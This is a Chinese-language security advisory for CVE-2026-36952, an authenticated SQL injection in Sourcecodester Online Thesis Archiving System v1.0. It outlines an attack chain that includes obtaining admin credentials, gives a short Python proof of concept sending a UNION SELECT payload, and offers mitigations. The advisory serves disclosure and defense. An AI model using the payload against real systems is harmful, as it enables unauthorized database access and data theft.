IPBUF安全漏洞报告
English
CVE-2026-36952 CVSS 2.7 低危

CVE-2026-36952: Online Thesis Archiving System SQL注入漏洞

披露日期: 2026-04-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-36952
漏洞类型
SQL注入
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Sourcecodester Online Thesis Archiving System

相关标签

SQL注入CVE-2026-36952SourcecodesterWeb安全后台漏洞

漏洞概述

Sourcecodester Online Thesis Archiving System v1.0版本被发现存在SQL注入漏洞。该漏洞位于系统后台的/otas/admin/curriculum/manage_curriculum.php文件中。由于开发人员未能对用户提交的数据进行严格的过滤和验证,导致攻击者可以通过构造特定的恶意SQL语句来操纵后端数据库查询。尽管该漏洞的CVSS评分较低(2.7),且利用需要高权限,但成功利用仍可能导致敏感数据泄露。

技术细节

该漏洞的根本原因在于应用程序在构建SQL查询时,直接将HTTP请求参数拼接到查询语句中,未使用参数化查询或预编译语句。根据CVSS向量分析,攻击需要高权限(PR:H),说明漏洞点位于管理员认证后的受保护页面。攻击者首先需要获取管理员账户权限并登录系统。随后,在访问`/otas/admin/curriculum/manage_curriculum.php`接口时,攻击者可以在特定的参数(如ID或搜索字段)中注入SQL控制字符(例如单引号 `'` 或注释符 `--`)。通过基于布尔的盲注、联合查询(UNION SELECT)或报错注入技术,攻击者可以绕过应用逻辑,从数据库中提取包括管理员哈希、用户信息在内的敏感数据。由于是低权限用户交互且网络攻击向量复杂度低,该漏洞具有明确的利用场景。

攻击链分析

STEP 1
侦察
识别目标系统为Sourcecodester Online Thesis Archiving System v1.0,并定位管理员登录入口。
STEP 2
获取凭证
通过钓鱼、暴力破解或其他手段获取高权限管理员账号和密码(漏洞利用的前提条件,PR:H)。
STEP 3
会话建立
使用获取的管理员凭证登录系统,获取有效的Session Cookie或Token。
STEP 4
漏洞利用
访问存在漏洞的页面/otas/admin/curriculum/manage_curriculum.php,并在参数中注入恶意SQL Payload。
STEP 5
数据窃取
分析返回的HTTP响应,提取泄露的数据库信息,如版本、表结构或敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target.com/otas/admin/curriculum/manage_curriculum.php" # Attacker's session cookie (Required due to PR:H) cookies = { "PHPSESSID": "valid_admin_session_id" } # Vulnerable parameter payload (Example: extracting database version) payload = { "id": "1 UNION SELECT 1, version(), 3, 4-- -" } try: response = requests.get(url, params=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check response for database version output.") print(response.text[:200]) else: print("[-] Failed to send request.") except Exception as e: print(f"[!] Error: {e}")

影响范围

Sourcecodester Online Thesis Archiving System v1.0

防御指南

临时缓解措施
在官方补丁发布前,建议通过WAF(Web应用防火墙)规则拦截针对该路径的异常SQL注入尝试。同时,应严格限制管理员后台的访问来源IP,并加强管理员账户的安全策略,强制使用强密码,防止账户被攻破从而触发漏洞利用条件。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表